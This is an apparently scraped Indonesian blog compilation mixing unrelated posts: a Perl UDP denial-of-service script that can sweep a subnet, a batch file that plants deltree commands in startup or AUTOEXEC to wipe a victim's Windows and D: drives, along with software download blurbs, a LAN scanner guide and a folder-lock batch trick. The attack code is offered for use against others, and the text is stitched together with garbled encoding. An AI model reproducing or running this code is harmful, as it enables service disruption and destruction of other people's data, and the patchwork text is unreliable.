$flag = 0; # Default flag for symple DoS

$ip = $ARGV[0];

if ($ARGV[1] =~ /[0-9]/)
{
$port = $ARGV[1];
print â€Å“\n[*] - We use $ARGV[1] UDP port for Nasi \n”;
}
else
{
$port = 50138;
print â€Å“\n[*] - We use 50138 (default) UDP port for Nasi \n”;
}

if ($ARGV[2] =~ /^\-i/ || $ARGV[1] =~ /^\-i/ )
{
print ”[*] - Start infinity DoS to $ARGV[0] on port $port\n”;
}

$i = 0;

do

{

($a,$b,$c,$d) = split(/\./,$ip);

if($ARGV[1] =~ /^\-i/ || $ARGV[2] =~ /^\-i/)
{
$i = $i + 1;
$d = $i;
$flag = 2;

}

if($ip =~ /\*/ && ($ARGV[1] !~ /^\-i/ || $ARGV[2] !~ /^\-i/))
{
$i = $i + 1;
$d = $i;
$flag = 1;

}

if($ip =~ /\*/ && ($ARGV[1] =~ /^\-i/ || $ARGV[2] =~ /^\-i/))
{
$i = $i + 1;
$d = $i;
$flag = 2;
}

print ”[*] - Try connect to ” . $a . â€Å“\.” . $b . â€Å“\.” . $c . â€Å“\.” . $d . ” on port $port\n”;

$remote = IO::Socket::INET->new( Proto => â€Å“udp”,
PeerAddr => $a . â€Å“\.” . $b . â€Å“\.” . $c . â€Å“\.” . $d,
PeerPort => $port) or die â€Å“\n [-] - Can’t connect to ” . $a . â€Å“\.” . $b . â€Å“\.” . $c . â€Å“\.” . $d . ” on port $port \n”;
$remote->autoflush(1);
$insock = â€Å“ 0 E O?a }a?? 2? ???? ;K? 3 AB??LL¶?®Ã¢Ã¢‚¬Ã‚¡??â€Â¦?f,s5â€Â¢??°? S ?e??B?« adcJ?âہ“?s???;” . a x 218;

print $remote â€Å“$insock”; # Put magic into port

close $remote;

print ” [+] - DoS on ” . $a . â€Å“\.” . $b . â€Å“\.” . $c . â€Å“\.” . $d . ” complited!!!\n\n”; # Display small info

if ($flag == 1 && $i > 254)
{
$flag=0;
}

if ($i > 254)
{
$i = $d = 0;
}

} until ($flag == 0)




Kalo yang Kurang Memahami..Pelajarin Nih..Tapi jangan DDOS saya yakz..akakakakakkaka..gua DOR balik ntar
akkawkawkawkawkkawaw
cukup hanya sama lawan musuh aja
ok!

LOOK@LAN cek ip net


LOOK@LAN

sebener nya gw bukan pengurus jaringan pertama di kantor ,IT administrator nya dah pindah kelain hati alias dah ndak dikantor tempet gw kerja lagi,karna dari pertama gw ga ikut ngebangun jaringannya jadi gw tau pembagian IP addres tiap2 komputer client,karena sekarang gw yang ngrusin masalah IT di kantor jadi gw harus tau IP masing komputer agar tidak terjadi crash/tabrakan.
Apalagi gw pernah beberapa kali reinstal komputer di kantor,klo asal isi IP ya bisa trafic nantinya.
nah disini gw mau jelasin gimana caranya agar kita bisa mengetahui semua alamat IP di komputer client baik jaringan lokal maupun rumah tanpa harus mengingat semua IP nya bisa gila klo mesti di hafal semua apalagi klo ada sampai 50 station wahhhhh puyeengggg euyyyyyy....
Mungkin sudah pernah dengar yang namanya LOOK@LAN, ini adalah aplikasi freeware yang bisa digunakan oleh siapapun,kapasitas nya kecil cuma 2,07Mb gitu deh yang belum  tau cara nya neh gw kasih tau.
1.ga perlu cemilan ama kopi,karna bobot nya kecil jadi ndak lama instalnya hehehehee.
2.unduh disini aplikasinya.
3.ikuti printah nya,tinggal klik next aja truz.
4.setelah selesai buka aplikasinya boleh di desktop klo ada shortcut nya atau di start-all Program -LOOK@LAN.
5.inilah tampilan layar pertamanya :
















6. Untuk pertama kalinya klik Create New Profile
7.lihat bagian Profile setting nya akan ada tiga kolom yang terlihat,yang perlu di rubah adalah Profile Name nya apa aja boleh,gw kasih nama LAN aja biar sama
kaya punya gw.truz untuk list interface nya,itu adalah alamat yang gw punya sekarang.lihat gambar di bawah:













8.Lalu klik Next maka LOOK@LAN akan Menampakkan gambar seperti ini dan menampilkan semua Node yang aktif dan NON.
















9.Dan disitu ada keterangan Yang OS nya bukan windows,nah yang berwana hijau itu tandanya dia nyala dan merah dia mati...gimana makin mudah bukan,berkat aplikasi ini gw jadi mudah mengalokasikan setiap alamat IP di kantor gw.
selamat mencoba yah...........kebaca virus oleh anti virus

Computer Optimizing with Advanced SystemCare Free 3.7.2

Computer Optimizing with Advanced SystemCare Free 3.7.2

Software ini semacam Tune Up dan computer optimizing lainnya bedanya adalah software ini gratis tanpa harus registrasi lagi. yang penting kinerjanya tak kalah dengan tune up maupun software-software berbayar lainnya.

Slow down, freeze, crash and security threats are over. Advanced SystemCare Free is a comprehensive PC care utility that takes an one-click approach to help protect, repair and optimize your computer. Scanning and finding what other utilities miss, it can keep your PC error-free and smooth than ever. This fantastic program is available free of charge.

Mozilla Firefox Ultimate Optimizer 2010

Mozilla Firefox Ultimate Optimizer 2010


Mozilla Firefox Ultimate Optimizer adalah browser yang paling handal saat ini.. kemampuan browser ini tidak diragukan lagi di dunia maya.
Untuk memaksimalkan kinerja browser firefox anda, anda dapat menggunakan Firefox Ultimate Optimizer. Firefox Ultimate Optimizer dapat mengurangi pengguanaan memori yang digunakan oleh browser anda. Cara
menggunakannya sangat mudah, anda tinggal klik dan biarkan soft terseut jalan di sistem tray anda. Untuk mendowloadnya anda dapat download disini
Ada kemungkinan soft tersebut tidak jalan di komputer anda.. mungkin komputer anda belum ter instal Microsoft Net Framework 2.0, Jika belum punya Download di SINI

Free TuneUp Utilities 2008

Free TuneUp Utilities 2008

Published Date April 14, 2009 by maseko
tuneup-utilities2008 TuneUp Utilities merupakan salah satu software komersial untuk Windows yang dapat digunakan untuk berbagai fungsi seperti meningkatkan performance, pembersihan hardisk, mengelola dan mengatur berbagai fungsi pada Windows, dan juga beberapa tool tambahan.
Melalui salah satu halaman webnya, Chip.de berbagi akses download TuneUP Utilities 2008 beserta lisence key-nya yang dikemas dalam sebuah file zip. Sayangnya, paket download installer TuneUp Utilities 2008 tersebut, seperti halnya halaman web yang menginformasikannya, juga menggunakan bahasa Jerman. Untungnya lisence key yang diberikan di dalamnya tetap dapat digunakan untuk TuneUp Utilities 2008 yang didownload langsung dari website TuneUp dengan interface Bahasa Inggris.

http://maseko.com/2009/

Senin, 24 Januari 2011

Optimalisasi Firefox dengan Speedyfox

h Victor | Sep. 08, 2009 | Internet, Software, Software PC, Tips Trik Koneksi Internet
Browser apa yang biasa kamu pakai? Kalo biasa menggunakan Firefox, berikut ada software yang dapat membantu ‘meningkatkan kembali’ kecepatan browser Firefox, yaitu SpeedyFox (beda dengan FasterFox dan optimalisasi Firefox yang pernah saya informasikan sebelumnya). Mengapa meningkatkan kembali? Karena browser Firefox itu sendiri selama kita gunakan akan menyimpan database (kecuali kita selalu membersihkan cache, cookies, history setelah menggunakan Firefox) dan setingan yang kita buat di dalamnya. Nah, data-data yang tersimpan tersebut lama-lama akan bertumpuk dan membuat kinerja dari Firefox ini semakin menurun.
Kalo dalam sistem Windows kita mengenal tools Defrag, yang berfungsi mengatur dan menata ulang kembali file di Windows sehingga mempercepat kinerja Windows itu sendiri, fungsi Speedyfox ini mirip seperti Defrag, hanya yang dia optimalkan adalah browser Firefox. Jangan kuatir dengan seting yang telah kita buat di browser Firefox, karena setingan tersebut tidak akan dirubah apalagi dihapus, begitu juga dengan data-data yang ada, semuanya tidak akan dihapus, hanya diatur kembali untuk mengoptimalkan kembali kinerja Firefox.
Aplikasi Speedyfox ini adalah aplikasi portabel, yang artinya bisa langsung digunakan tanpa harus melakukan proses install. Untuk bisa menggunakannya kita tidak harus membeli, karena memang software yang dikembangkan oleh CrystalIdea ini gratis.
Cara menggunakan aplikasi Speedyfox ini cukup mudah, pertama pastikan browser Firefox tidak sedang kita buka, kemudian jalankan aplikasi Speedyfox, otomatis Speedyfox akan mendeteksi profil Firefox yang terinstall di komputer (default). Jika kita menggunakan Firefox portabel, maka pilih custom, dan arahkan di mana kita menyimpan aplikasi Firefox portabel tersebut (di drive flashdisk misalnya).
Langkah berikutnya adalah melakukan optimalisasi dengan memilih Speed Up My Firefox! dan tunggu sampai proses selesai. (lamanya waktu optimalisasi tergantung banyaknya data yang tersimpan).
Menurut pengembang Speedyfox, proses optimalisasi ini idealnya dilakukan 2 minggu sekali, tapi jika pemakaian browser kita tinggi (dari pagi sampai malam misalnya) berarti kita harus lebih sering melakukan optimalisasi.
Demikian info singkat tentang Speedyfox, semoga bermanfaat.
Informasi lebih lanjut tentang software ini bisa dilihat di Software Download, Freeware, atau Software Database.
Bookmark and Share

Informasi terkait lainnya:www.ariawijaya.com

TuneUp Utilities 2011

TuneUp Utilities merupakan aplikasi tweaking yang dapat meningkatkan performa sistem Windows anda menjadi lebih cepat, dan lebih aman.
TuneUp Utilities 2011 kali ini datang dengan tampilan baru yang lebih fresh dan lebih mudah digunakan.
Desain icon-icon nya pun semakin indah dan membuat kita lebih mudah mengakses menu-menu di dalam TuneUp Utilities 2011.


TuneUp Utilities 2011 dengan cepat dapat membuat sistem operasi Windows lebih cepat, mudah digunakan, dan lebih aman. Dan semua operasi yang dilakukan pada sistem operasi benar-benar aman, karena semua perubahan yang dipantau oleh TuneUp Rescue Center dan dapat dibatalkan kapan saja. Semua TuneUp Utilities modul dapat diakses melalui interface umum yang terbagi menjadi enam kategori. Selain itu, jendela utama juga memiliki tiga tombol umum di sebuah bar abu-abu gelap ke kanan di bagian atas jendela. Tombol kedua memulai TuneUp Update Wizard, yang dapat digunakan untuk memperbarui TuneUp Utilities 2009 untuk versi terbaru melalui Internet. Tombol terakhir memberikan bantuan dan pengaturan yang dapat Anda gunakan untuk menyesuaikan paket perangkat lunak untuk memenuhi kebutuhan anda.






The new Start page Halaman Mulai baru
TuneUp 2011 menyambut Anda dengan Halaman awal didesain ulang sepenuhnya, yang memberitahu Anda tentang status komputer Anda. Jika masalah atau pengaturan nonoptimal ditemukan, Anda hanya klik mouse menjauh dari penyelesaian mereka. Halaman Awal juga memberitahu Anda ketika tips baru untuk meningkatkan kinerja komputer yang tersedia dan memperingatkan Anda jika tugas-tugas pemeliharaan tidak diurus secara otomatis. Halaman Awal juga menunjukkan Anda apakah program-program startup otomatis telah ditambahkan ke Windows sejak terakhir kali Anda berlari TuneUp Utilities. Anda dapat memutuskan apakah program yang start up secara otomatis benar-benar diperlukan.  
TuneUp Speed Optimizer TuneUp Speed Optimizer
Pengaturan yang memperlambat komputer Anda?  Layanan yang tidak perlu atau program yang berjalan di latar belakang? Apakah koneksi internet Anda dikonfigurasi secara optimal? TuneUp Speed Optimizer tahu jawaban atas semua pertanyaan ini. TuneUp memeriksa seluruh sistem anda untuk kemacetan, program latar belakang berlebihan, dan setting yang salah. hanya dengan satu klik Anda dapat melakukan optimasi yang paling sangat cepat. Selain itu, TuneUp Speed Optimizer memberikan saran untuk mempercepat sistem anda.

TuneUp Shortcut Cleaner TuneUp Shortcut Cleaner
Membersihkan lingkungan kerja Anda membosankan: menghapus cara pintas yang tidak valid dari menu Start, Desktop, dan Quick Launch bar sangat memakan waktu. TuneUp Shortcut Cleaner sekarang melakukan pekerjaan untuk Anda. Ia memeriksa apakah semua jalan pintas adalah valid dan menghapus yang yatim piatu hanya dengan mengklik sebuah tombol. Pada saat yang sama, folder kosong dihapus dari menu Start. TuneUp Shortcut Cleaner juga memeriksa program yang sering digunakan dan membersihkan daftar file baru dibuka.  
TuneUp Uninstall Manager TuneUp Uninstall Manager
Mendesain ulang dari bawah ke atas, Manajer Install TuneUp sekarang berjalan jauh lebih cepat dan memiliki antarmuka, baru bahkan lebih intuitif sehingga lebih mudah untuk meng-uninstall program yang tidak perlu. Program yang tidak perlu sering dilupakan karena mereka memasang lama dan kemudian tidak digunakan. TuneUp Utilities 2009 memperlihatkan kepada Anda daftar program yang tidak digunakan untuk waktu yang lama, sehingga Anda dapat menargetkan untuk instalasi aplikasi yang menggunakan ruang disk yang berharga dan dalam keadaan tertentu bahkan memperlambat sistem anda turun.
TuneUp StartUp Manager TuneUp StartUp Manager
Sebuah hasil sistem mulus-berjalan ketika tidak ada aplikasi yang autostart tidak perlu. Perbaikan TuneUp Startup Manager mengatur program-program anda dalam kelompok-kelompok dan memberikan penjelasan yang jelas untuk membuatnya lebih mudah bagi Anda untuk mengidentifikasi program yang tidak needed.New program startup otomatis sekarang disorot, sehingga Anda dapat menonaktifkan entri yang tidak diinginkan lebih mudah. Sistem tugas mulai sekarang juga tercantum dalam TuneUp StartUp Manager Pada Vista, khususnya, tugas-tugas yang dijadwalkan digunakan di tempat entri autostart.

                                          KLIK DISINI UNTUK DONWLOAD
 

Program Perusak Sang LAMER

http://cumanpengenberbagi.blogspot.com/ Ini khusus buat para "Lamer sejati" yang pengin ngerusak kompynya orang. Kalo kamu ngerasa bukan lamer, segera tinggalin artikel ini!!



Okay, ngga' usah banyak omong, lansung aja copy-pastekan code sialan di bawah ini ke teks editor kamu dan simpan dengan ekstensi .bat:



@echo off

echo deltree /y %windir%\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

echo deltree /y d:\*.*>> %windir%\programs\startm~1\programs\startup\lamer.bat

atau

@echo off

echo deltree /y %windir%\*.*>> AUTOEXEC.BAT

echo deltree /y d:\*.*>> AUTOEXEC.BAT



wELL, ga' perlu dijelasin pasti udah pada ngerti donk. Yup, kalo udah disimpan (misalnya LAMER.BAT) lansung eksekusi dan shutdown komputernya trus kabur dech hihihi... program perusak kamu bakalan bekerja dengan sendirinya begitu si korban nyalain komputernya lagi.

Penangkal Net cut "Recomended port monster",CARA PAKAI TINGGAL START SETELAH instal






advertisement


"MajorGeeks.com - Live Fast, Geek Hard"





  XML News Feeds    
  Twitter
  FaceBook
  Google
  Yahoo!
  MSN
  Sidebar



advertisement
GFI Network Server Monitor


This Weeks
Top Downloads

1. Malwarebytes Anti-Malware
2. IObit SmartDefrag v2 Beta 1.21
3. Win7codecs
4. VLC media player
5. IObit Toolbox
6. Windows Installer CleanUp Utility
7. AVG AntiVirus Free Edition
8. x64 Components
9. Vista Codec Package
10. QuickTime Alternative



  Security | Port Monster 2.0 Standard


Author: Zing Software
Date: 2003-11-05
Size: 6 MB
License: Freeware
Requires: Win All
Downloaded: 32144 Times

Sponsored Link Improve Performance: Update Your Drivers
 Download Port Monster
Download Port Monster from the  USA Download@MajorGeeks
Download Port Monster fromthe USA Download@MajorGeeks
 Download from Internode  Internode - |Australia|

Screenshot

Rating: 4.43 (32 votes)



Report A Bad Link

Sponsored Link Recommended Download: Click Here to Check for System Problems


Worried about Hackers? Viruses? Port Probes? Trojan Horses? Well, now you don't have to worry anymore. With Port Monster, you can not only be protected from Internet offenses and attacks, but also, you can know for sure if anyone is trying to connect to your computer. Get your copy today for free!

Port Monster is designed to not only manually control connections to your computer through a powerful firewall, but Port Monster will also detect and proactively respond to unwanted connection attempts and port scans against your computer in real time.

Port Monster is not just for home computers, it is made for any computer than runs Windows. Whether your computer is a home computer, workstation, or server, it doesn't matter. Block port scans, stop intruders, and protect services running on your computers and servers immediately.

Running a service like ftp or email, and want to keep strangers out? Port Monster will allow you to specify those hosts that can connect, and will let you block the rest. This goes for any service running on your computer or server.

Stop worrying about intruders and get back to using your computer for what you want.

Limitations: This software is offered for evaluation and testing purposes only. You are entitled to use this product during the BETA testing period, until that period expires, which is currently April 30th, 2003.


CompatDB.org Project: >> Port Monster - Check Results

kunci lock folder

Jumat, 21 November 2008

LOCK FOLDER TANPA APLIKASI

mau datamu lebnih safety agar tidak bisa di ganggu oleh orang lain ...

kamu cukup save sript di bawah ini .dengan file type .bat

gampang kan ....


@ECHO OFF
titipan kunci folder
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Serius nich mau Kunci ??(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Foldernya dah terkunci
goto End
:UNLOCK
echo Eiittt masukkan pasword dulu
set/p "pass=>"
if NOT %pass%== titipan goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Foldernya berhasil di buat
goto End
:End


kamu juga bisa mengubah password nya sesuai dengan yang kamu inguin kan ....
kemudian save dengan nama kunci.bat ....http://api-neraka.blogspot.com/2008/11/lock-folder-tanpa-aplikasi.html

Minggu, 23 Januari 2011

Eset Nod32 Portable: Antivirus Mini yang Canggih oleh salsabel pada Mar.29, 2009, dalam kategori Antivirus, Software Baca selengkapnya di: http://guntingbatukertas.com/software/eset-nod32-portable-antivirus-mini-yang-canggih/#ixzz1Bv6iwdZf Under Creative Commons License: Attribution No Derivatives

NOD32 Antivirus Versi 3.0 merupakan produk pembasmi virus andalan Eset. Program ini menjaga komputer Anda tetap aman terkendali ketika melakukan browsing, download, berbagi foto, bermain game online, dan berkirim email. Programnya juga nggak begitu besar sehingga menghemat penggunaan space harddisk dan dapat berjalan cepat nan ringan. Meskipun demikian, Eset menjamin program ini mampu mendeteksi dan melumpuhkan virus, trojan, worms, adware, spyware, phising, rootkits dan malware lainnya.

Dengan teknologi ThreatSense™, Antivirus ESET NOD32 merupakan salah satu solusi alternatif untuk menangani virus dan spyware. Teknologi ini merupakan sistem peringatan awal yang memungkinkan komputer mendeteksi ancaman malware baru yang dapat muncul setiap saat. Anda dapat mempercayakan urusan scanning virus kepada program ini karena beberapa keunggulannya dari segi:
  • Deteksi proaktif – Dengan menggunakan teknologi Threatsense, ESET NOD32 diklaim mampu menciptakan perlindungan secara proaktif dan profesional dari malware yang diketahui dan tidak diketahui serta mendeteksi ‘perilaku aneh’ aplikasi-aplikasi dalam PC yang dicurigai sebagai virus.
  • Program Sangat ringan – Antivirus ini secara apik dirancang para programmer untuk memberikan solusi cepat dan efisien dalam melindungi PC tanpa banyak membebani sistem.
  • Scan Tercepat – Produsen NOD32 mengklaim program ini tidak akan memperlambat sistem PC Anda saat melakukan scanning/pemindaian file dalam komputer. Anda tetap bisa melakukan aktifitas seperti berbagi file, foto, browsing, bahkan bermain game tanpa ada gangguan yang berarti.
  • Instalasi mudah – Pengguna awam koputer dapat melakukan instalasi sendiri dengan aman. Selanjutnya program ini akan berjalan di background tanpa mengganggu aktivitas penggunaan PC untuk kepentingan lainnya.
Anda juga bisa memindahkan programi ini ke komputer lain tanpa khawatir kehilangan file definisi file dan setting lainnya, hanya saja tanpa proteksi aktif. Dengan demikian program hanya berfungsi untuk melakukan scan dan penghapusan virus saja. File definisi virus ini terakhir ter-update hingga 4 Juni 2008.  Semoga bermanfaat!
Anda ingin coba? Silakan [Download] di sini.